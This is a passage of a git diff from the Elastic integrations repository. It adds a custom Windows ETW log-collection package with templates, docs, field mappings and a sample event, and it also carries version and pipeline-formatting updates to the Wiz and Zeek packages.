+[Here](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/nf-evntrace-enabletraceex2) you can read more information about these parameters. + +The full documentation for the input are available [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-etw.html), including more examples about how to configure it. + +## Fields Mapping + +In addition to the fields specified below, this integration includes the ECS Dynamic Template. Any field that follow the ECS Schema will get assigned the correct index field mapping and does not need to be added manually. + +{{ fields }} diff --git a/packages/windows_etw/agent/input/etw.yml.hbs b/packages/windows_etw/agent/input/etw.yml.hbs new file mode 100644 index 00000000000..d37e058500b --- /dev/null +++ b/packages/windows_etw/agent/input/etw.yml.hbs @@ -0,0 +1,40 @@ +condition: ${host.platform} == 'windows' + +data_stream: + dataset: {{data_stream.dataset}} +{{#if provider_name}} +provider.name: {{provider_name}} +{{/if}} +{{#if provider_guid}} +provider.guid: {{provider_guid}} +{{/if}} +{{#if session_name}} +session_name: {{session_name}} +{{/if}} +{{#if trace_level}} +trace_level: {{trace_level}} +{{/if}} +{{#if logfile}} +file: {{logfile}} +{{/if}} +{{#if session}} +session: {{session}} +{{/if}} +{{#if match_any_keyword}} +match_any_keyword: "{{match_any_keyword}}" +{{/if}} +{{#if match_all_keyword}} +match_all_keyword: "{{match_all_keyword}}" +{{/if}} +{{#if tags.length}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{/if}} +{{#if pipeline}} +pipeline: {{pipeline}} +{{/if}} +{{#if custom}} +{{custom}} +{{/if}} diff --git a/packages/windows_etw/changelog.yml b/packages/windows_etw/changelog.yml new file mode 100644 index 00000000000..dea84384815 --- /dev/null +++ b/packages/windows_etw/changelog.yml @@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.1.0" + changes: + - description: Initial release + type: enhancement + link: https://github.com/elastic/integrations/pull/9413 diff --git a/packages/windows_etw/docs/README.md b/packages/windows_etw/docs/README.md new file mode 100644 index 00000000000..b68465b4ad3 --- /dev/null +++ b/packages/windows_etw/docs/README.md @@ -0,0 +1,99 @@ +# Custom Windows ETW package + +The custom Windows ETW ([Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/event-tracing-portal)) package allows you to ingest events from any ETW provider available. Providers can be listed by running [`logman query providers`](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman-query) in any Windows command-line interface. + +This integration currently supports manifest-based, user-mode MOF (classic) and TraceLogging providers while WPP providers are not supported. [`Here`](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) you can find more information about the available types of providers. + +It is supported in every Windows versions supported by [`Filebeat`](https://www.elastic.co/support/matrix), starting from Windows 10 and Windows Server 2016. + +This package does not contain any ingest pipeline, so no pre-ingest data processing is applied out of the box. Custom ingest pipelines can be added through the Kibana UI to get the data in the desired format. + +## Configuration + +This integration can interact with ETW in three distinct ways: it can create a new session to capture events from user-mode providers, attach to an already existing session to collect ongoing event data, or read events from a pre-recorded .etl file. For that reason, when configuring the integration there are three parameters that are mutually exclusive, but at least one of them must be set: Provider (Name or GUID), File and Session. + +Event trace level may be specified at `critical`, `error`, `warning`, `information`, or `verbose`. The system will ingest events that correspond to the specified trace level or exceed it in terms of severity. + +Events may be filtered using event masks with the `Match Any Keyword` or `Match All Keyword` parameters. The `Match Any Keyword` parameter specifies a 64-bit bitmask where an event is ingested if any of the bits set in this bitmask match any of the keyword bits set in the event's properties, allowing for a broad selection of events based on multiple criteria. Conversely, the `Match All Keyword` parameter requires that all bits set in its 64-bit bitmask match the event's keyword bits for the event to be ingested.The correct format for both fields is `0x` followed by a 16-character hexadecimal number. + +[Here](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/nf-evntrace-enabletraceex2) you can read more information about these parameters. + +The full documentation for the input are available [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-etw.html), including more examples about how to configure it. + +## Fields Mapping + +In addition to the fields specified below, this integration includes the ECS Dynamic Template. Any field that follow the ECS Schema will get assigned the correct index field mapping and does not need to be added manually. + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host is running. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | Name of the project in Google Cloud. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host is running. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Event dataset. | constant_keyword | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| input.type | Input type. | keyword | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. | keyword | +| log.level | Original log level of the log event. If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). Some examples are `warn`, `err`, `i`, `informational`. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| winlog.activity_guid | A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. Deprectad in favor of `winlog.activity_id` from 8.14.0, it will be removed in future releases. | keyword | +| winlog.activity_id | A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. | keyword | +| winlog.channel | Used to enable special event processing. Channel values below 16 are reserved for use by Microsoft to enable special treatment by the ETW runtime. Channel values 16 and above will be ignored by the ETW runtime (treated the same as channel 0) and can be given user-defined semantics. | keyword | +| winlog.event_data | The event-specific data. The content of this object is specific to any provider and event. | object | +| winlog.event_data.Address | | keyword | +| winlog.event_data.AddressLength | | keyword | +| winlog.event_data.DynamicAddress | | keyword | +| winlog.event_data.Index | | keyword | +| winlog.event_data.Interface | | keyword | +| winlog.event_data.TotalServerCount | | keyword | +| winlog.flags | Flags that provide information about the event such as the type of session it was logged to and if the event contains extended data. | keyword | +| winlog.keywords | The keywords are used to indicate an event's membership in a set of event categories. | keyword | +| winlog.opcode | The opcode defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged. | keyword | +| winlog.process_id | Identifies the process that generated the event. | keyword | +| winlog.provider_guid | A globally unique identifier that identifies the provider that logged the event. | keyword | +| winlog.session | Configured session to forward ETW events from providers to consumers. | keyword | +| winlog.task | The task defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged. | keyword | +| winlog.thread_id | Identifies the thread that generated the event. | keyword | +| winlog.version | Specify the version of a manifest-based event. | long | + diff --git a/packages/windows_etw/fields/agent.yml b/packages/windows_etw/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/windows_etw/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/windows_etw/fields/base-fields.yml b/packages/windows_etw/fields/base-fields.yml new file mode 100644 index 00000000000..b6a962b0f87 --- /dev/null +++ b/packages/windows_etw/fields/base-fields.yml @@ -0,0 +1,19 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.dataset + type: constant_keyword + description: Event dataset. +- name: event.module + type: constant_keyword + description: Event module. + value: windows_etw +- name: "@timestamp" + type: date + description: Event timestamp. diff --git a/packages/windows_etw/fields/ecs.yml b/packages/windows_etw/fields/ecs.yml new file mode 100644 index 00000000000..779a00a4af5 --- /dev/null +++ b/packages/windows_etw/fields/ecs.yml @@ -0,0 +1,24 @@ +- external: ecs + name: ecs.version +- external: ecs + name: event.category +- external: ecs + name: event.code +- external: ecs + name: event.created +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.type +- external: ecs + name: log.file.path +- external: ecs + name: log.level +- external: ecs + name: tags diff --git a/packages/windows_etw/fields/winlog.yml b/packages/windows_etw/fields/winlog.yml new file mode 100644 index 00000000000..9f1e870be2b --- /dev/null +++ b/packages/windows_etw/fields/winlog.yml @@ -0,0 +1,90 @@ +- name: winlog + type: group + description: > + All fields specific to the Windows Event Tracing are defined here. + + fields: + - name: activity_guid + type: keyword + description: > + A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. Deprectad in favor of `winlog.activity_id` from 8.14.0, it will be removed in future releases. + + - name: activity_id + type: keyword + description: > + A globally unique identifier that identifies the current activity. The events that are published with this identifier are part of the same activity. + + - name: channel + type: keyword + description: > + Used to enable special event processing. Channel values below 16 are reserved for use by Microsoft to enable special treatment by the ETW runtime. Channel values 16 and above will be ignored by the ETW runtime (treated the same as channel 0) and can be given user-defined semantics. + + - name: event_data + type: object + object_type: keyword + description: > + The event-specific data. The content of this object is specific to any provider and event. + + - name: event_data + type: group + description: > + This is a non-exhaustive list of parameters that are used in Windows events. By having these fields defined in the template they can be used in dashboards and machine-learning jobs. + + fields: + - name: Address + type: keyword + - name: AddressLength + type: keyword + - name: DynamicAddress + type: keyword + - name: Index + type: keyword + - name: Interface + type: keyword + - name: TotalServerCount + type: keyword + - name: flags + type: keyword + description: > + Flags that provide information about the event such as the type of session it was logged to and if the event contains extended data. + + - name: keywords + type: keyword + description: > + The keywords are used to indicate an event's membership in a set of event categories. + + - name: opcode + type: keyword + description: > + The opcode defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged. + + - name: process_id + type: keyword + description: > + Identifies the process that generated the event. + + - name: provider_guid + type: keyword + description: > + A globally unique identifier that identifies the provider that logged the event. + + - name: session + type: keyword + description: > + Configured session to forward ETW events from providers to consumers. + + - name: task + type: keyword + description: > + The task defined in the event. Task and opcode are typically used to identify the location in the application from where the event was logged. + + - name: thread_id + type: keyword + description: > + Identifies the thread that generated the event. + + - name: version + type: long + description: > + Specify the version of a manifest-based event. + diff --git a/packages/windows_etw/img/logo_windows.svg b/packages/windows_etw/img/logo_windows.svg new file mode 100644 index 00000000000..953b33d8f5a --- /dev/null +++ b/packages/windows_etw/img/logo_windows.svg @@ -0,0 +1,3 @@ + + + diff --git a/packages/windows_etw/kibana/tags.yml b/packages/windows_etw/kibana/tags.yml new file mode 100644 index 00000000000..47f20a8f551 --- /dev/null +++ b/packages/windows_etw/kibana/tags.yml @@ -0,0 +1,4 @@ +- text: Security Solution + asset_types: + - dashboard + - search diff --git a/packages/windows_etw/manifest.yml b/packages/windows_etw/manifest.yml new file mode 100644 index 00000000000..d38dff14522 --- /dev/null +++ b/packages/windows_etw/manifest.yml @@ -0,0 +1,119 @@ +format_version: 3.1.0 +name: windows_etw +title: Custom Windows ETW logs +description: Collect and parse logs from any Windows ETW provider with Elastic Agent. +type: input +version: 0.1.0 +conditions: + kibana: + version: ^8.13.0 +categories: + - custom + - os_system +policy_templates: + - name: etw + type: logs + title: Custom Windows ETW logs + description: Collect custom Windows ETW logs. + input: etw + template_path: etw.yml.hbs + vars: + - name: provider_name + type: text + title: Provider Name + description: >- + Name of of an ETW provider (eg. Microsoft-Windows-DNSServer). Run `logman query providers` to list the available providers in the endpoint. + required: false + show_user: true + - name: provider_guid + type: text + title: Provider GUID + description: >- + GUID of of an ETW provider (eg. `{EB79061A-A566-4698-9119-3ED2807060E7}`). Run `logman query providers` to list the available providers in the endpoint. + required: false + show_user: true + - name: session_name + type: text + title: Session Name + description: >- + When specifying a provider, a new session is created. This controls the name for the new ETW session it will create. If not specified, the session will be named using the provider ID prefixed by 'Elastic-'. + required: false + show_user: true + - name: logfile + type: text + title: File + description: >- + Path to an .etl file to read from. + required: false + show_user: true + - name: session + type: text + title: Session + description: >- + An existing ETW session to read from. Existing sessions can be listed using `logman query -ets`. + required: false + show_user: true + - name: trace_level + type: text + title: Trace Level + description: >- + Defines the filtering level for events based on severity. Valid options include critical, error, warning, information, and verbose. The provider writes an event if the event's level is more severe or equal to the defined value. + default: information + required: false + show_user: true + - name: match_any_keyword + type: text + title: Match Any Keyword + description: >- + An 8-byte bitmask used for filtering events from specific provider subcomponents based on keyword matching. Any matching keyword will enable the event to be written. Default value is `0xfffffffffffffffff` so it matches every available keyword. Run `logman query providers ""` to list the available keywords for a specific provider. + default: "0xffffffffffffffff" + required: false + show_user: false + - name: match_all_keyword + type: text + title: Match All Keyword + description: >- + Similar to MatchAnyKeyword, this 8-byte bitmask filters events that match all specified keyword bits. Default value is 0 to let every event pass. Run `logman query providers ""` to list the available keywords for a specific provider. + default: "0x0000000000000000" + required: false + show_user: false + - name: data_stream.dataset + type: text + title: Dataset name + description: >- + Dataset to write data to. Changing the dataset will send the data to a different index. You can't use `-` in the name of a dataset and only valid characters for [Elasticsearch index names](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-index_.html). + default: etw.winlog + required: true + show_user: true + - name: pipeline + type: text + show_user: true + title: Ingest Pipeline + description: | + The Ingest Node pipeline ID to be used by the integration. + - name: tags + type: text + title: Tags + description: Tags to include in the published event. + required: false + multi: true + show_user: false + - name: custom + type: yaml + title: Custom Configurations + description: >- + Here YAML configuration options can be used to be added to your configuration. Be careful using this as it might break your configuration file. + required: false + show_user: false + default: |- + # Configuration example + #processors: + # - drop_event.when.not.or: + # - equals.event.code: '903' + # - equals.event.code: '1024' +icons: + - src: "/img/logo_windows.svg" + type: "image/svg+xml" +owner: + github: elastic/sec-windows-platform + type: elastic diff --git a/packages/windows_etw/sample_event.json b/packages/windows_etw/sample_event.json new file mode 100644 index 00000000000..062f093d827 --- /dev/null +++ b/packages/windows_etw/sample_event.json @@ -0,0 +1,72 @@ +{ + "@timestamp": "2024-03-20T09:41:40.009Z", + "ecs": { + "version": "8.0.0" + }, + "log": { + "level": "information" + }, + "data_stream": { + "namespace": "default", + "type": "logs", + "dataset": "etw.winlog" + }, + "elastic_agent": { + "id": "fab64289-aeff-4492-8f6c-be1c578898d8", + "version": "8.13.0", + "snapshot": true + }, + "event": { + "severity": 4, + "agent_id_status": "verified", + "ingested": "2024-03-20T09:41:52Z", + "code": "1001", + "provider": "Microsoft-Windows-DNS-Client", + "created": "2024-03-20T09:41:42.098Z", + "kind": "event", + "dataset": "etw.winlog" + }, + "host": { + "hostname": "ec2amaz-253cq8c", + "os": { + "build": "20348.2322", + "kernel": "10.0.20348.2322 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Datacenter", + "type": "windows", + "family": "windows", + "version": "10.0", + "platform": "windows" + }, + "ip": [ + "fe80::dd4a:8121:e72b:6f21", + "172.31.87.64" + ], + "name": "ec2amaz-253cq8c", + "id": "6e134718-e196-4a81-8c7d-db595a4b6452", + "mac": [ + "12-7E-D2-0B-F3-35" + ], + "architecture": "x86_64" + }, + "winlog": { + "process_id": "1688", + "thread_id": "3492", + "task": "1001", + "keywords": "9223372036854775808", + "provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}", + "session": "ETW-DNS-Client", + "activity_id": "{00000000-0000-0000-0000-000000000000}", + "channel": "16", + "flags": "576", + "event_data": { + "AddressLength": "16", + "TotalServerCount": "1", + "Address": "172.31.0.2", + "Index": "1", + "DynamicAddress": "dynamic ", + "Interface": "Ethernet 2" + }, + "opcode": "0", + "version": 0 + } +} diff --git a/packages/windows_etw/validation.yml b/packages/windows_etw/validation.yml new file mode 100644 index 00000000000..a96151416a6 --- /dev/null +++ b/packages/windows_etw/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00005 # Kibana version for saved tags. diff --git a/packages/wiz/changelog.yml b/packages/wiz/changelog.yml index 2cfb9ad6f95..e2e3eb5625d 100644 --- a/packages/wiz/changelog.yml +++ b/packages/wiz/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/wiz/manifest.yml b/packages/wiz/manifest.yml index a5d1f0842d7..b57f47aef86 100644 --- a/packages/wiz/manifest.yml +++ b/packages/wiz/manifest.yml @@ -1,14 +1,15 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: wiz title: Wiz -version: "1.0.1" +version: "1.1.1" description: Collect logs from Wiz with Elastic Agent. type: integration categories: - security + - cloudsecurity_cdr conditions: kibana: - version: "^8.10.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: @@ -52,6 +53,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL @@ -66,6 +68,7 @@ policy_templates: default: https://auth.app.wiz.io/oauth/token required: true show_user: false + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/zeek/changelog.yml b/packages/zeek/changelog.yml index 32e71ac3f17..54d2fb5af22 100644 --- a/packages/zeek/changelog.yml +++ b/packages/zeek/changelog.yml @@ -1,4 +1,25 @@ # newer versions go on top +- version: "2.24.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "2.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9126 +- version: "2.22.4" + changes: + - description: Prevent null dereference exceptions for missing fields. + type: bugfix + link: https://github.com/elastic/integrations/pull/9029 + - description: Improve case-insensitive string comparisons. + type: bugfix + link: https://github.com/elastic/integrations/pull/9029 + - description: Clean up multi-line syntax in ingest pipelines. + type: bugfix + link: https://github.com/elastic/integrations/pull/9029 - version: "2.22.3" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml index 27dfdc3856a..d71a6f883c6 100644 --- a/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml @@ -313,12 +313,9 @@ processors: - info source: >- if (ctx.zeek?.connection?.state == null) { - - return; - } if (params.containsKey(ctx.zeek.connection.state)) { - - + } + if (params.containsKey(ctx.zeek.connection.state)) { ctx.zeek.connection.state_message = params[ctx.zeek.connection.state]["conn_str"]; ctx.event.type = params[ctx.zeek.connection.state]["types"]; } diff --git a/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml index 791734244ec..0eea5c2c725 100644 --- a/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml @@ -147,22 +147,22 @@ processors: - script: lang: painless source: >- - def answers = ctx.zeek.dns.answers; def ttls = ctx.zeek.dns.TTLs; if (answers.isEmpty() || ttls.isEmpty() || answers.length != ttls.length) { - - + def answers = ctx.zeek.dns.answers; + def ttls = ctx.zeek.dns.TTLs; + if (answers.isEmpty() || ttls.isEmpty() || answers.length != ttls.length) { return; - } def lst = new ArrayList(); for (def i = 0; i < answers.length; i++) { - - + } + def lst = new ArrayList(); + for (def i = 0; i < answers.length; i++) { lst.add([ "data": answers[i], "ttl": (int)ttls[i] ]) - } if (ctx.dns == null) { - - + } + if (ctx.dns == null) { ctx.dns = new HashMap(); - } ctx.dns.answers = lst; + } + ctx.dns.answers = lst; if: "ctx.zeek?.dns?.answers != null && ctx.zeek?.dns?.TTLs != null" - foreach: field: dns.answers @@ -177,14 +177,15 @@ processors: - script: lang: painless source: >- - def answers = ctx.dns.answers; def iplist = new ArrayList(); for (def i = 0; i < ctx.dns.answers.length; i++) { - - + def answers = ctx.dns.answers; + def iplist = new ArrayList(); + for (def i = 0; i < ctx.dns.answers.length; i++) { if (answers[i].containsKey("tmpip")) { iplist.add(answers[i].tmpip); answers[i].remove("tmpip"); } - } ctx.dns.resolved_ip = iplist; + } + ctx.dns.resolved_ip = iplist; if: 'ctx.dns?.answers != null && !ctx.dns?.answers.isEmpty()' - set: field: event.outcome diff --git a/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml index 64110c32c44..8a4363d8ede 100644 --- a/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml @@ -217,7 +217,7 @@ processors: - set: field: threat.indicator.type value: ipv6-addr - if: ctx.threat?.indicator?.ip != null && ctx.threat.indicator.ip.contains(':') + if: ctx.threat?.indicator?.ip?.contains(':') == true - geoip: database_file: GeoLite2-ASN.mmdb field: threat.indicator.ip diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log index b8b803cbd6c..93caf3a0acf 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log @@ -1,2 +1,3 @@ {"ts":1507565599.590346,"uid":"C56Flhb4WQBNkfMOl","id.orig_h":"192.168.10.31","id.orig_p":49242,"id.resp_h":"192.168.10.10","id.resp_p":88,"request_type":"TGS","client":"RonHD/CONTOSO.LOCAL","service":"HOST/admin-pc","success":true,"till":2136422885.0,"cipher":"aes256-cts-hmac-sha1-96","forwardable":true,"renewable":true,"cert.client_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","cert.server_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US"} 